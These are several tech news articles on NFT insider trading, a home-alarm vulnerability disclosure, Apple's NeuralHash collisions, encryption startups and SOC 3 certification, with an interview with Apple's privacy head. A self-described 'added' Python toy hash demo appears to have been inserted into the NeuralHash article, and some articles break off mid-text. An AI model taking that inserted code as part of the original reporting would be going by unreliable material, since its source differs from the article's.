OpenSea admits incident as top exec is accused of trading NFTs on insider information

The “eBay of NFTs” is running into a scandal as it admits one of its employees traded the crypto digital assets using insider information from the platform.

Yesterday, a top executive at NFT platform OpenSea was accused of front-running sales on the platform, purchasing pieces from NFT collections before they were featured on the homepage of the platform. According to Twitter user @ZuwuTV, the startup’s Head of Product was using secret crypto wallets to buy drops before they listed on the main page of OpenSea, selling them shortly after they were highlighted publicly by OpenSea, and funneling the profits back to his main account. Users pointed to a handful of transactions on the public blockchain from accounts linked back to the executive, including an NFT drop that was, at the time, actively listed on the front page of the platform.

Today, OpenSea seemed to acknowledge the incident, saying in a blog post that it had “learned that one of our employees purchased items that they knew were set to display on our front page before they appeared there publicly.” The company did not identify the employee but said that they were conducting an “immediate” review of the incident. The startup, which was recently valued at $1.5 billion after raising a $100 million Series B from Andreessen Horowitz, added in the unsigned blog post that this incident was “incredibly disappointing.”

“We’re conducting a thorough review of yesterday’s incident and are committed to doing the right thing for OpenSea users,” OpenSea CEO Devin Finzer said in a tweet.

OpenSea, which did a record $3.4 billion in transaction volume last month, appears not to have had any rules in place preventing employees from using confidential information to buy or sell NFTs on its own platform to its own users. The company detailed that it was now implementing a policy that team members could not buy or sell “from collections or creators while we are featuring or promoting them,” and that they are “prohibited from using confidential information to purchase or sell any NFTs, whether available on the OpenSea platform or not.”

Most NFTs are not generally assumed to be securities, despite little official guidance from the SEC on the crypto asset class. Some in the space have questioned whether different mechanics around buying and selling, alongside ongoing rewards structures may be pushing some NFT sales further into securities territory.

“Many have been enticed by dramatic jumps in the value of new digital assets,” Senate Banking Committee Chairman Sherrod Brown said in a hearing yesterday — as transcribed by The Block — where the relationship between crypto markets and SEC enforcement was discussed. “Some professional investors and celebrities make earning millions look easy. But, as we are reminded time and again, it’s never that simple – and too often, someone’s quick profit comes at the expense of workers and entire communities.”

We’ve reached out to OpenSea for further comment.


A popular smart home security system can be remotely disarmed, researchers say

A cybersecurity company says a popular smart home security system has a pair of vulnerabilities that can be exploited to disarm the system altogether.

Rapid7 found the vulnerabilities in the Fortress S03, a home security system that relies on Wi-Fi to connect cameras, motion sensors, and sirens to the internet, allowing owners to remotely monitor their home anywhere with a mobile app. The security system also uses a radio-controlled key fob to let homeowners arm or disarm their house from outside their front door.

But the cybersecurity company said the vulnerabilities include an unauthenticated API and an unencrypted radio signal that can be easily intercepted.

Rapid7 revealed details of the two vulnerabilities on Tuesday after not hearing from Fortress in three months, the standard window of time that security researchers give to companies to fix bugs before details are made public. Rapid7 said its only acknowledgment of its email was when Fortress closed its support ticket a week later without commenting.

Fortress owner Michael Hofeditz opened but did not respond to several emails sent by TechCrunch with an email open tracker. An email from Bottone Riling, a Massachusetts law firm representing Fortress, called the claims “false, purposely misleading and defamatory,” but did not provide specifics that it claims are false, or if Fortress has mitigated the vulnerabilities.

Rapid7 said that Fortress’ unauthenticated API can be remotely queried over the internet without the server checking if the request is legitimate. The researchers said by knowing a homeowner’s email address, the server would return the device’s unique IMEI, which in turn could be used to remotely disarm the system.

The other flaw takes advantage of the unencrypted radio signals sent between the security system and the homeowner’s key fob. That allowed Rapid7 to capture and replay the signals for “arm” and “disarm” because the radio waves weren’t scrambled properly.

Vishwakarma said homeowners could use a plus-tagged email address containing a long, unique string of letters and numbers as a stand-in for a password. But there was little for homeowners to do about the radio signal bug until Fortress addresses it.

Fortress has not said if it has fixed or plans to fix the vulnerabilities. It’s not clear if Fortress is able to fix the vulnerabilities without replacing the hardware. It’s not known if Fortress builds the device itself or buys the hardware from another manufacturer.


CryptoPunks blasts past $1 billion in lifetime sales as NFT speculation surges

Hello friends, and welcome back to Week in Review! Last week we dove into Bezos’s Blue Origin suing NASA. This week, I’m writing about the unlikely and triumphant resurgence of the NFT market.

If you’re reading this on the TechCrunch site, you can get this in your inbox from the newsletter page, and follow my tweets @lucasmtny.

The big thing

If I could, I would probably write about NFTs in this newsletter every week. I generally stop myself from actually doing so because I try my best to make this newsletter a snapshot of what’s important to the entire consumer tech sector, not just my niche interests. That said, I’m giving myself free rein this week.

The NFT market is just so hilariously bizarre and the culture surrounding the NFT world is so web-native, I can’t read about it enough. But in the past several days, the market for digital art on the blockchain has completely defied reason.

Back in April, I wrote about a platform called CryptoPunks that — at that point — had banked more than $200 million in lifetime sales since 2017. The little pop art pixel portraits have taken on a life of their own since then. It was pretty much unthinkable back then but in the past 24 hours alone, the platform did $141 million in sales, a new record. By the time you read this, the NFT platform will have likely passed a mind-boggling $1.1 billion in transaction volume according to crypto tracker CryptoSlam. With 10,000 of these digital characters, to buy a single one will cost you at least $450,000 worth of the Ethereum cryptocurrency. (When I sent out this newsletter yesterday that number was $300k)

It’s not just CryptoPunks either; the entire NFT world has exploded in the past week, with several billions of dollars flowing into projects with drawings of monkeys, penguins, dinosaurs and generative art this month alone. After the NFT rally earlier this year — culminating in Beeple’s $69 million Christie’s sale — began to taper off, many wrote off the NFT explosion as a bizarre accident. What triggered this recent frenzy?

Part of it has been a resurgence of cryptocurrency prices toward all-time-highs and a desire among the crypto rich to diversify their stratospheric assets without converting their wealth to fiat currencies. Dumping hundreds of millions of dollars into an NFT project with fewer stakeholders than the currencies that underlie them can make a lot of sense to those whose wealth is already over-indexed in crypto. But a lot of this money is likely FOMO dollars from investors who are dumping real cash into NFTs, bolstered by moves like Visa’s purchase this week of their own CryptoPunk.

I think it’s pretty fair to say that this growth is unsustainable, but how much further along this market growth gets before the pace of investment slows or collapses is completely unknown. There are no signs of slowing down for now, something that can be awfully exciting — and dangerous — for investors looking for something wild to drop their money into… and wild this market truly is.

Here’s some advice from Figma CEO Dylan Field who sold his alien CryptoPunk earlier this year for 4,200 Eth (worth $13.6 million today).


Other things

Here are the TechCrunch news stories that especially caught my eye this week:

OnlyFans suspends its porn ban
In a stunning about-face, OnlyFans declared this week that they won’t be banning “sexually explicit content” from their platform after all, saying in a statement that they had “secured assurances necessary to support our diverse creator community and have suspended the planned October 1 policy change.”

Kanye gets into the hardware business
Ahead of the drop of his next album, which will definitely be released at some point, rapper Kanye West has shown off a mobile music hardware device called the Stem Player. The $200 pocket-sized device allows users to mix and alter music that has been loaded onto the device. It was developed in partnership with hardware maker Kano.

Apple settles developer lawsuit
Apple has taken some PR hits in recent years following big and small developers alike complaining about the take-it-or-leave-it terms of the company’s App Store. This week, Apple shared a proposed settlement (which still is pending a judge’s approval) that starts with a $100 million payout and gets more interesting with adjustments to App Store bylines, including the ability of developers to advertise paying for subscriptions directly rather than through the app only.

Twitter starts rolling out ticketed Spaces
Twitter has made a convincing sell for its Clubhouse competitor Spaces, but they’ve also managed to build on the model in recent months, turning its copycat feature into a product that succeeds on its own merits. Its latest effort to allow creators to sell tickets to events is just starting to roll out, the company shared this week.

CA judge strikes down controversial gig economy proposition
Companies like Uber and DoorDash dumped tens of millions of dollars into Prop 22, a law which clawed back a California law that pushed gig economy startups to classify workers as full employees. This week a judge declared the proposition unconstitutional, and though the decision has been stayed on appeal, any adjustment would have major ramifications for those companies’ business in California.


Extra things

Some of my favorite reads from our Extra Crunch subscription service this week:

Future tech exits have a lot to live up to
“Inflation may or may not prove transitory when it comes to consumer prices, but startup valuations are definitely rising — and noticeably so — in recent quarters. That’s the obvious takeaway from a recent PitchBook report digging into valuation data from a host of startup funding events in the United States…”

OpenSea UX teardown
“…is the experience of creating and selling an NFT on OpenSea actually any good? That’s what UX analyst Peter Ramsey has been trying to answer by creating and selling NFTs on OpenSea for the last few weeks. And the short answer is: It could be much better...

Are B2B SaaS marketers getting it wrong?
“‘Solutions,’ ‘cutting-edge,’ ‘scalable’ and ‘innovative’ are just a sample of the overused jargon lurking around every corner of the techverse, with SaaS marketers the world over seemingly singing from the same hymn book. Sadly for them, new research has proven that such jargon-heavy copy — along with unclear features and benefits — is deterring customers and cutting down conversions…”


Thanks for reading! And again, if you’re reading this on the TechCrunch site, you can get this in your inbox from the newsletter page, and follow my tweets @lucasmtny.

Lucas Matney


Apple’s CSAM detection tech is under fire — again

Apple has encountered monumental backlash to a new child sexual abuse imagery (CSAM) detection technology it announced earlier this month. The system, which Apple calls NeuralHash, has yet to be activated for its billion-plus users, but the technology is already facing heat from security researchers who say the algorithm is producing flawed results.

NeuralHash is designed to identify known CSAM on a user’s device without Apple having to possess the image or know its contents. Because a user’s photos stored in iCloud are end-to-end encrypted so that even Apple can’t access the data, NeuralHash instead scans for known CSAM on the user’s device, which Apple claims is more privacy friendly because it limits the scanning to photos, unlike other companies that scan all of a user’s files.

Apple does this by looking for images on a user’s device whose hash — a string of letters and numbers that can uniquely identify an image — matches one of the hashes provided by child protection organizations like NCMEC. If NeuralHash finds 30 or more matching hashes, the images are flagged to Apple for a manual review before the account owner is reported to law enforcement. Apple says the chance of a false positive is about one in one trillion accounts.

But security experts and privacy advocates have expressed concern that the system could be abused by highly-resourced actors, like governments, to implicate innocent victims or to manipulate the system to detect other materials that authoritarian nation states find objectionable. NCMEC called critics the “screeching voices of the minority,” according to a leaked memo distributed internally to Apple staff.

Last night, Asuhariet Ygvar reverse-engineered Apple’s NeuralHash into a Python script and published code to GitHub, allowing anyone to test the technology regardless of whether they have an Apple device to test. In a Reddit post, Ygvar said NeuralHash “already exists” in iOS 14.3 as obfuscated code, but was able to reconstruct the technology to help other security researchers understand the algorithm better before it’s rolled out to iOS and macOS devices later this year.

It didn’t take long before others tinkered with the published code and soon came the first reported case of a “hash collision,” which in NeuralHash’s case is where two entirely different images produce the same hash. Cory Cornelius, a well-known research scientist at Intel Labs, discovered the hash collision. Ygvar confirmed the collision a short time later.

Hash collisions can be a death knell to systems that rely on cryptography to keep them secure, such as encryption. Over the years several well-known password hashing algorithms, like MD5 and SHA-1, were retired after collision attacks rendered them ineffective.
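To make the matching and collision mechanics concrete, here is an added toy model (not Apple’s code, and not NeuralHash itself: a simple difference hash stands in for the perceptual hash). It shows that a perceptual hash deliberately maps near-identical images to the same value, that two visibly different constructed images can collide under such a hash, and why a per-account threshold of 30 matches is what stands between a single collision and an escalation. The image grids, blocklist and threshold value are constructed for this illustration.

```python
"""Toy threshold-based perceptual hash matching (constructed example, not NeuralHash)."""
from typing import List

Image = List[List[int]]  # rows of grayscale pixels, 0..255

MATCH_THRESHOLD = 30  # matches needed before manual review (figure cited in the article)


def dhash(img: Image, size: int = 8) -> int:
    """Difference hash: shrink the image to (size+1) x size cells by block
    averaging, then emit one bit per cell saying whether its right-hand
    neighbour is brighter. Small brightness shifts do not change the bits."""
    h, w = len(img), len(img[0])
    rows, cols = size, size + 1
    cells = []
    for r in range(rows):
        y0, y1 = r * h // rows, max((r + 1) * h // rows, r * h // rows + 1)
        row = []
        for c in range(cols):
            x0, x1 = c * w // cols, max((c + 1) * w // cols, c * w // cols + 1)
            block = [img[y][x] for y in range(y0, y1) for x in range(x0, x1)]
            row.append(sum(block) / len(block))
        cells.append(row)
    bits = 0
    for r in range(rows):
        for c in range(size):
            bits = (bits << 1) | (1 if cells[r][c] < cells[r][c + 1] else 0)
    return bits


def hamming(a: int, b: int) -> int:
    """Number of differing bits between two hashes."""
    return bin(a ^ b).count("1")


def count_matches(device_hashes: List[int], blocklist: List[int], max_distance: int = 0) -> int:
    """How many device images match some blocklist entry within max_distance bits."""
    return sum(1 for h in device_hashes
               if any(hamming(h, b) <= max_distance for b in blocklist))


def should_escalate(device_hashes: List[int], blocklist: List[int],
                    threshold: int = MATCH_THRESHOLD) -> bool:
    """Escalate to manual review only once the match count reaches the threshold."""
    return count_matches(device_hashes, blocklist) >= threshold


# --- constructed sample images (18 rows x 27 columns) ---------------------
W, H = 27, 18


def gradient_image() -> Image:
    """Left-to-right brightness ramp; stands in for a listed image."""
    return [[x * 255 // (W - 1) for x in range(W)] for _ in range(H)]


def brightened(img: Image, delta: int = 40) -> Image:
    """Same picture with the exposure pushed up: a near-duplicate."""
    return [[min(255, p + delta) for p in row] for row in img]


def striped_image() -> Image:
    """Different-looking picture (horizontal stripes) that still brightens left to
    right within every stripe, so the toy hash cannot tell it apart: a collision."""
    return [[min(255, x * 200 // (W - 1) + (y % 2) * 50) for x in range(W)] for y in range(H)]


def demo() -> dict:
    listed = gradient_image()
    blocklist = [dhash(listed)]
    near_dup = brightened(listed)
    collider = striped_image()
    return {
        "near_duplicate_matches": hamming(dhash(near_dup), blocklist[0]) == 0,
        "collision": dhash(collider) == blocklist[0] and collider != listed,
        # 29 colliding images stay below the bar; the 30th crosses it
        "escalate_29": should_escalate([dhash(collider)] * 29, blocklist),
        "escalate_30": should_escalate([dhash(collider)] * 30, blocklist),
    }


if __name__ == "__main__":
    print(demo())
```

The threshold and the manual review are mitigations for exactly the failure mode the article describes: one colliding image is not, by itself, enough to trigger a report.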

Kenneth White, a cryptography expert and founder of the Open Crypto Audit Project, said in a tweet: “I think some people aren’t grasping that the time between the iOS NeuralHash code being found and [the] first collision was not months or days, but a couple of hours.”

When reached, an Apple spokesperson declined to comment on the record. But in a background call where reporters were not allowed to quote executives directly or by name, Apple downplayed the hash collision and argued that the protections it puts in place — such as a manual review of photos before they are reported to law enforcement — are designed to prevent abuses. Apple also said that the version of NeuralHash that was reverse-engineered is a generic version, and not the complete version that will roll out later this year.

It’s not just civil liberties groups and security experts that are expressing concern about the technology. A senior lawmaker in the German parliament sent a letter to Apple chief executive Tim Cook this week saying that the company is walking down a “dangerous path” and urged Apple not to implement the system.


Evervault’s ‘encryption as a service’ is now open access

Dublin-based Evervault, a developer-focused security startup which sells encryption via API and is backed by a raft of big name investors including the likes of Sequoia, Kleiner Perkins and Index Ventures, is coming out of closed beta today — announcing open access to its encryption engine.

The startup says some 3,000 developers are on its waitlist to kick the tyres of its encryption engine, which it calls E3.

Among “dozens” of companies in its closed preview are drone delivery firm Manna, fintech startup Okra, and healthtech company Vital. Evervault says it’s targeting its tools at developers at companies with a core business need to collect and process four types of data: Identity & contact data; Financial & transaction data; Health & medical data; and Intellectual property.

The first suite of products it offers on E3 are called Relay and Cages; the former providing a new way for developers to encrypt and decrypt data as it passes in and out of apps; the latter offering a secure method — using trusted execution environments running on AWS — to process encrypted data by isolating the code that processes plaintext data from the rest of the developer stack.

Evervault is the first company to get a product deployed on Amazon Web Services’ Nitro Enclaves, per founder Shane Curran.

“Nitro Enclaves are basically environments where you can run code and prove that the code that’s running in the data itself is the code that you’re meant to be running,” he tells TechCrunch. “We were the first production deployment of a product on AWS Nitro Enclaves — so in terms of the people actually taking that approach we’re the only ones.”

It shouldn’t be news to anyone to say that data breaches continue to be a serious problem online. And unfortunately it’s sloppy security practices by app makers — or even a total lack of attention to securing user data — that’s frequently to blame when plaintext data leaks or is improperly accessed.

Evervault’s fix for this unfortunate ‘feature’ of the app ecosystem is to make it super simple for developers to bake in encryption via an API — taking the strain of tasks like managing encryption keys. (“Integrate Evervault in 5 minutes by changing a DNS record and including our SDK,” is the developer-enticing pitch on its website.)

“At the high level what we’re doing… is we’re really focusing on getting companies from [a position of] not approaching security and privacy from any perspective at all — up and running with encryption so that they can actually, at the very least, start to implement the controls,” says Curran.

“One of the biggest problems that companies have these days is they basically collect data and the data sort of gets sprawled across both their implementation and their test sets as well. The benefit of encryption is that you know exactly when data was accessed and how it was accessed. So it just gives people a platform to see what’s happening with the data and start implementing those controls themselves.”

With C-Suite executives paying increasing mind to the need to properly secure data — thanks to years of horrific data breach scandals (and breach déjà vu), and also because of updated data protection laws like Europe’s General Data Protection Regulation (GDPR) which has beefed up penalties for lax security and data misuse — a growing number of startups are now pitching services that promise to deliver ‘data privacy’, touting tools they claim will protect data while still enabling developers to extract useful intel.

Evervault’s website also deploys the term “data privacy” — which it tells us it defines to mean that “no unauthorized party has access to plaintext user/customer data; users/customers and authorized developers have full control over who has access to data (including when and for what purpose); and, plaintext data breaches are ended”. (So encrypted data could, in theory, still leak — but the point is the information would remain protected as a result of still being robustly encrypted.)

Among a number of techniques being commercialized by startups in this space is homomorphic encryption — a process that allows for analysis of encrypted data without the need to decrypt the data.

Evervault’s first offering doesn’t go that far — although its ‘encryption manifesto‘ notes that it’s keeping a close eye on the technique. And Curran confirms it is likely to incorporate the approach in time. But he says its first focus has been to get E3 up and running with an offering that can help a broad swathe of developers.

“Fully homomorphic [encryption] is great. The biggest challenge if you’re targeting software developers who are building normal services it’s very hard to build general purpose applications on top of it. So we take another approach — which is basically using trusted execution environments. And we worked with the Amazon Web Services team on being their first production deployment of their new product called Nitro Enclaves,” he tells TechCrunch.

“The bigger focus for us is less about the underlying technology itself and it’s more about taking what the best security practices are for companies that are already investing heavily in this and just making them accessible to average developers who don’t even know how encryption works,” Curran continues. “That’s where we get the biggest nuance of Evervault vs some of these others privacy and security companies — we build for developers who don’t normally think about security when they’re building things and try to build a great experience around that… so it’s really just about bridging the gap between ‘the start of art’ and bringing it to average developers.”

“Over time fully homomorphic encryption is probably a no-brainer for us but both in terms of performance and flexibility for your average developer to get up and running it didn’t really make sense for us to build on it in its current form. But it’s something we’re looking into. We’re really looking at what’s coming out of academia — and if we can fit it in there. But in the meantime it’s all this trusted execution environment,” he adds.

Curran suggests Evervault’s main competitor at this point is open source encryption libraries — so basically developers opting to ‘do’ the encryption piece themselves. Hence it’s zeroing in on the service aspect of its offering; taking on encryption management tasks so developers don’t have to, while also reducing their security risk by ensuring they don’t have to touch data in the clear.

“When we’re looking at those sort of developers — who’re already starting to think about doing it themselves — the biggest differentiator with Evervault is, firstly the speed of integration, but more importantly it’s the management of encrypted data itself,” Curran suggests. “With Evervault we manage the keys but we don’t store any data and our customers store encrypted data but they don’t store keys. So it means that even if they want to encrypt something with Evervault they never have all the data themselves in plaintext — whereas with open source encryption they’ll have to have it at some point before they do the encryption. So that’s really the base competitor that we see.”

“Obviously there are some other projects out there — like Tim Berners-Lee’s Solid project and so on. But it’s not clear that there’s anybody else taking the developer-experience focused approach to encryption specifically. Obviously there’s a bunch of API security companies… but encryption through an API is something we haven’t really come across in the past with customers,” he adds.

While Evervault’s current approach sees app makers’ data hosted in dedicated trusted execution environments running on AWS, the information still exists there as plaintext — for now. But as encryption continues to evolve it’s possible to envisage a future where apps aren’t just encrypted by default (Evervault’s stated mission is to “encrypt the web”) but where user data, once ingested and encrypted, never needs to be decrypted — as all processing can be carried out on ciphertext.

Homomorphic encryption has unsurprisingly been called the ‘holy grail’ of security and privacy — and startups like Duality are busy chasing it. But the reality on the ground, online and in app stores, remains a whole lot more rudimentary. So Evervault sees plenty of value in getting on with trying to raise the encryption bar more generally.

Curran also points out that plenty of developers aren’t actually doing much processing of the data they gather — arguing therefore that caging plaintext data inside a trusted execution environment can thus abstract away a large part of the risk related to these sort of data flows anyway. “The reality is most developers who are building software these days aren’t necessarily processing data themselves,” he suggests. “They’re actually just sort of collecting it from their users and then sharing it with third party APIs.

“If you look at a startup building something with Stripe — the credit card flows through their systems but it always ends up being passed on somewhere else. I think that’s generally the direction that most startups are going these days. So you can trust the execution — depending on the security of the silicon in an Amazon data center kind of makes the most sense.”

On the regulatory side, the data protection story is a little more nuanced than the typical security startup spin.

While Europe’s GDPR certainly bakes security requirements into law, the flagship data protection regime also provides citizens with a suite of access rights attached to their personal data — a key element that’s often overlooked in developer-first discussions of ‘data privacy’.

Evervault concedes that data access rights haven’t been front of mind yet, with the team’s initial focus being squarely on encryption. But Curran tells us it plans — “over time” — to roll out products that will “simplify access rights as well”.

“In the future, Evervault will provide the following functionality: Encrypted data tagging (to, for example, time-lock data usage); programmatic role-based access (to, for example, prevent an employee seeing data in plaintext in a UI); and, programmatic compliance (e.g. data localization),” he further notes on that.


Insider hacks to streamline your SOC 3 certification application

If you’re a tech company offering anyone a service, somewhere in your future is a security assessment giving you the seal of approval to manage clients’ data and operate on your devices. No one takes security lightly anymore. The business costs of cyberattacks have now hit an all-time high. Government bodies, companies and consumers need the assurance that the next software they download isn’t going to be an open door for hackers.

For good reason, security certifications like the SOC 3 really put you through the wringer. My company, Waydev, has just attained the SOC 3 certification, becoming one of the first development analytics tools to receive that accreditation. We learned so much from the process, we felt it was right to share our experience with others that might be daunted by the prospect.

As a non-tech founder, it was hard not only to navigate the process, but to appreciate its value. But by putting our business caps on, our team was able to optimize our approach and minimize the time and effort needed to achieve our goal. In doing so, we were granted SOC 3 compliance in two weeks, as opposed to the two months it takes some companies.

We also turned the assessment into an opportunity to better our product, align our internal teams, boost our brand and even launch partnerships.

So here’s our advice on how teams can smoothly reach a SOC 3 while simultaneously balancing workloads and minimizing disruption to users.

First, bring your teams on board

Because we can’t expect employees to stack those hours on top of their regular workdays, as a leader you have to accept — and communicate — that the speed of your output will inevitably decrease.

As a founder, you’ll be acting as captain steering a ship into that SOC 3 port, and you’ll need all members of your crew to join forces. This isn’t a job for a specially designated security team alone and will require deep involvement from your development and other teams, too. That might lead to internal resistance, as they still have a full-time job tending to your product and customers.

That’s why it’s so important to start by being crystal clear with your employees about what this process will mean to their work lives. However, they have to embrace the true benefits that will arise. SOC 3 will immediately raise your brand’s appeal and likely see new customers come in as a result.

Each employee will also come out the other end with well-honed cybersecurity skills — they’ll have a deep understanding of potential cyber threats to the company, and all security initiatives will carry a far lighter burden. There’s also the sense of pride and fulfillment that comes with having an indisputable edge over your competitors.


Baffle lands $20M Series B to simplify data-centric encryption

California-based Baffle, a startup that aims to prevent data breaches by keeping data encrypted from production through processing, has raised $20 million in Series B funding.

Baffle was founded in 2015 to help thwart the increasing threats to enterprise assets in public and private clouds. Unlike many solutions that only encrypt data in transit and at rest, Baffle’s solution keeps data encrypted while it’s being processed by databases and applications, through a “security mesh” that de-identifies sensitive data and which the company claims has no performance impact for customers.

The startup says its goal is to make data breaches “irrelevant” by efficiently encrypting data wherever it may be, so that even if there is a security breach, the data will be unavailable and unusable by hackers.

“Most encryption is misapplied, and quite frankly, doesn’t do anything to protect your data,” the startup claims. “The protection measures that are most commonly used do nothing to protect you against modern hacks and breaches.”

Baffle supports all major cloud platforms, including AWS, Google Cloud and Microsoft Azure, and it’s currently used to protect more than 100 billion records in financial services, healthcare, retail, industrial IoT, and government, according to the startup. The company claims it stores records belonging to the top 5 global financial services companies and five of the top 25 global companies.

“Securing IT infrastructure—networks, devices, databases, lakes and warehouses—is never complete. Constant change makes it impossible to adopt a zero trust security posture without protecting the data itself,” said Ameesh Divatia, co-founder and CEO of Baffle.

The startup’s Series B funding round, which comes more than three years after it closed $6 million in Series A financing, was led by new investor Celesta Capital with contributions from National Grid Partners, Lytical Ventures and Nepenthe Capital, and brings the startup’s total funding to date to $36.5 million.

Baffle, which says it has seen threefold revenue growth over the past year, tells TechCrunch that the funds will be used to help it grow to meet market demand and to invest further in product development. It also plans to double its headcount from 25 to 50 employees over the next 12 months.

“With this investment, we can meet market demand for data-centric cloud data protection that enables responsible digital information sharing and breaks the cycle of continuous data and privacy breaches,” Divatia added.

#cloud, #computer-security, #cryptography, #data-protection, #data-security, #encryption, #security

Interview: Apple’s Head of Privacy details child abuse detection and Messages safety features

Last week, Apple announced a series of new features targeted at child safety on its devices. The features are not live yet but will arrive for users later this year. While the goals of these features are universally accepted to be good ones, namely protecting minors and limiting the spread of Child Sexual Abuse Material (CSAM), there have been some questions about the methods Apple is using.

I spoke to Erik Neuenschwander, Head of Privacy at Apple, about the new features launching for its devices. He shared detailed answers to many of the concerns that people have about the features and talked at length about some of the tactical and strategic issues that could come up once this system rolls out.

I also asked about the rollout of the features, which come closely intertwined but are really completely separate systems that have similar goals. To be specific, Apple is announcing three different things here, some of which are being confused with one another in coverage and in the minds of the public. 

CSAM detection in iCloud Photos – A detection system called NeuralHash creates identifiers it can compare with IDs from the National Center for Missing and Exploited Children and other entities to detect known CSAM content in iCloud Photo libraries. Most cloud providers already scan user libraries for this information — Apple’s system is different in that it does the matching on device rather than in the cloud.

Communication Safety in Messages – A feature that a parent opts to turn on for a minor on their iCloud Family account. It will alert children when an image they are going to view has been detected to be explicit and it tells them that it will also alert the parent.

Interventions in Siri and search – A feature that will intervene when a user tries to search for CSAM-related terms through Siri and search and will inform the user of the intervention and offer resources.

For more on all of these features you can read our articles linked above or Apple’s new FAQ that it posted this weekend.

From personal experience, I know that there are people who don’t understand the difference between those first two systems, or assume that there will be some possibility that they may come under scrutiny for innocent pictures of their own children that may trigger some filter. It’s led to confusion in what is already a complex rollout of announcements. These two systems are completely separate, of course, with CSAM detection looking for precise matches with content that is already known to organizations to be abuse imagery. Communication Safety in Messages takes place entirely on the device and reports nothing externally — it’s just there to flag to a child that they are or could be about to be viewing explicit images. This feature is opt-in by the parent and transparent to both parent and child that it is enabled.

Apple’s Communication Safety in Messages feature. Image Credits: Apple

There have also been questions about the on-device hashing of photos to create identifiers that can be compared with the database. Though NeuralHash is a technology that can be used for other kinds of features like faster search in photos, it’s not currently used for anything else on iPhone aside from CSAM detection. When iCloud Photos is disabled, the feature stops working completely. This offers an opt-out for people but at an admittedly steep cost given the convenience and integration of iCloud Photos with Apple’s operating systems.

Though this interview won’t answer every possible question related to these new features, this is the most extensive on-the-record discussion by Apple’s senior privacy member. It seems clear from Apple’s willingness to provide access and its ongoing FAQs and press briefings (there have been at least 3 so far and likely many more to come) that it feels that it has a good solution here.

Despite the concerns and resistance, it seems as if it is willing to take as much time as is necessary to convince everyone of that. 

This interview has been lightly edited for clarity.

TC: Most other cloud providers have been scanning for CSAM for some time now. Apple has not. Obviously there are no current regulations that say that you must seek it out on your servers, but there is some roiling regulation in the EU and other countries. Is that the impetus for this? Basically, why now?

Erik Neuenschwander: Why now comes down to the fact that we’ve now got the technology that can balance strong child safety and user privacy. This is an area we’ve been looking at for some time, including current state of the art techniques, which mostly involve scanning through the entire contents of users’ libraries on cloud services, which — as you point out — isn’t something that we’ve ever done: to look through users’ iCloud Photos. This system doesn’t change that either; it neither looks through data on the device, nor does it look through all photos in iCloud Photos. Instead what it does is give us a new ability to identify accounts which are starting collections of known CSAM.

So the development of this new CSAM detection technology is the watershed that makes now the time to launch this. And Apple feels that it can do it in a way that it feels comfortable with and that is ‘good’ for your users?

That’s exactly right. We have two co-equal goals here. One is to improve child safety on the platform and the second is to preserve user privacy. And what we’ve been able to do across all three of the features is bring together technologies that let us deliver on both of those goals.

Announcing the Communication Safety in Messages feature and the CSAM detection in iCloud Photos system at the same time seems to have created confusion about their capabilities and goals. Was it a good idea to announce them concurrently? And why were they announced concurrently, if they are separate systems?

Well, while they are [two] systems they are also of a piece along with our increased interventions that will be coming in Siri and search. As important as it is to identify collections of known CSAM where they are stored in Apple’s iCloud Photos service, it’s also important to try to get upstream of that already horrible situation. So CSAM detection means that there’s already known CSAM that has been through the reporting process, and is being shared widely, re-victimizing children on top of the abuse that had to happen to create that material in the first place. And so to do that, I think, is an important step, but it is also important to do things to intervene earlier on when people are beginning to enter into this problematic and harmful area, or if there are already abusers trying to groom or to bring children into situations where abuse can take place, and Communication Safety in Messages and our interventions in Siri and search actually strike at those parts of the process. So we’re really trying to disrupt the cycles that lead to CSAM that then ultimately might get detected by our system.

The process of Apple’s CSAM detection in iCloud Photos system. Image Credits: Apple

Governments and agencies worldwide are constantly pressuring all large organizations that have any sort of end-to-end or even partial encryption enabled for their users. They often lean on CSAM and possible terrorism activities as rationale to argue for backdoors or encryption defeat measures. Is launching the feature and this capability with on-device hash matching an effort to stave off those requests and say, look, we can provide you with the information that you require to track down and prevent CSAM activity — but without compromising a user’s privacy?

So, first, you talked about the device matching so I just want to underscore that the system as designed doesn’t reveal — in the way that people might traditionally think of a match — the result of the match to the device or, even if you consider the vouchers that the device creates, to Apple. Apple is unable to process individual vouchers; instead, all the properties of our system mean that it’s only once an account has accumulated a collection of vouchers associated with illegal, known CSAM images that we are able to learn anything about the user’s account. 

Now, why to do it is because, as you said, this is something that will provide that detection capability while preserving user privacy. We’re motivated by the need to do more for child safety across the digital ecosystem, and all three of our features, I think, take very positive steps in that direction. At the same time we’re going to leave privacy undisturbed for everyone not engaged in the illegal activity.

Does this, creating a framework to allow scanning and matching of on-device content, create a framework for outside law enforcement to counter with, ‘we can give you a list, we don’t want to look at all of the user’s data but we can give you a list of content that we’d like you to match’. And if you can match it with this content you can match it with other content we want to search for. How does it not undermine Apple’s current position of ‘hey, we can’t decrypt the user’s device, it’s encrypted, we don’t hold the key?’

It doesn’t change that one iota. The device is still encrypted, we still don’t hold the key, and the system is designed to function on on-device data. What we’ve designed has a device side component — and it has the device side component, by the way, for privacy improvements. The alternative of just processing by going through and trying to evaluate users’ data on a server is actually more amenable to changes [without user knowledge], and less protective of user privacy.

Our system involves both an on-device component where the voucher is created, but nothing is learned, and a server-side component, which is where that voucher is sent along with data coming to Apple service and processed across the account to learn if there are collections of illegal CSAM. That means that it is a service feature. I understand that it’s a complex attribute that a feature of the service has a portion where the voucher is generated on the device, but again, nothing’s learned about the content on the device. The voucher generation is actually exactly what enables us not to have to begin processing all users’ content on our servers which we’ve never done for iCloud Photos. It’s those sorts of systems that I think are more troubling when it comes to the privacy properties — or how they could be changed without any user insight or knowledge to do things other than what they were designed to do.

One of the bigger queries about this system is that Apple has said that it will just refuse action if it is asked by a government or other agency to compromise by adding things that are not CSAM to the database to check for them on-device. There are some examples where Apple has had to comply with local law at the highest levels if it wants to operate there, China being an example. So how do we trust that Apple is going to hew to this rejection of interference if pressured or asked by a government to compromise the system?

Well first, that is launching only for US iCloud accounts, and so the hypotheticals seem to bring up generic countries or other countries that aren’t the US when they speak in that way, and therefore it seems to be the case that people agree US law doesn’t offer these kinds of capabilities to our government.

